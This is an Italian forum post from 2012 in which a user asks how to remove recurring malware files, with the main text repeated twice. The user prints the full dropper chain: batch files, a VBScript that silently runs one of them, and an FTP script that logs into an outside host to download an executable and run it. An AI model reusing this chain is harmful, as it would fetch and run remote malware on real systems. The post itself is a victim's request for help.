Cho
10-02-2012, 21:07
da qualche giorno su c continuano ad apparire 5 files così chiamati:
a.bat
ff.bat
gz
run.vbs
aa.exe
ho comodo internet security ma tengo la protezione antivirus disabilitata perchè altrimenti il pc si blocca dopo poche ore... comunque comodo rileva lo stesso i file come infetti anche se disattivato e credo che li blocchi, però nonostante li cancelli continuano a tornare..
ecco cosa c'è dentro i file:
a.bat
--------------------------------------
del c:\run.vbs
del c:\a.bat
--------------------------------------
ff.bat
--------------------------------------
ftp -s:c:\gz
c:\aa.exe
del c:\gz
cmd /c c:\a.bat
del c:\ff.bat
--------------------------------------
gz
--------------------------------------
open f1tp.3322.org
f1t
f1t
binary
get b.exe c:\aa.exe
bye
--------------------------------------
run.vbs
--------------------------------------
CreateObject("WScript.Shell").Run "cmd /c c:\ff.bat",0
--------------------------------------
aa.exe invece è zero byte
qui ho trovato qualche informazione:
http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Wimip-A/detailed-analysis.aspx
qualcuno ha idea di come rimuovere i files una volta per tutte? :mad:
a.bat
ff.bat
gz
run.vbs
aa.exe
ho comodo internet security ma tengo la protezione antivirus disabilitata perchè altrimenti il pc si blocca dopo poche ore... comunque comodo rileva lo stesso i file come infetti anche se disattivato e credo che li blocchi, però nonostante li cancelli continuano a tornare..
ecco cosa c'è dentro i file:
a.bat
--------------------------------------
del c:\run.vbs
del c:\a.bat
--------------------------------------
ff.bat
--------------------------------------
ftp -s:c:\gz
c:\aa.exe
del c:\gz
cmd /c c:\a.bat
del c:\ff.bat
--------------------------------------
gz
--------------------------------------
open f1tp.3322.org
f1t
f1t
binary
get b.exe c:\aa.exe
bye
--------------------------------------
run.vbs
--------------------------------------
CreateObject("WScript.Shell").Run "cmd /c c:\ff.bat",0
--------------------------------------
aa.exe invece è zero byte
qui ho trovato qualche informazione:
http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Wimip-A/detailed-analysis.aspx
qualcuno ha idea di come rimuovere i files una volta per tutte? :mad: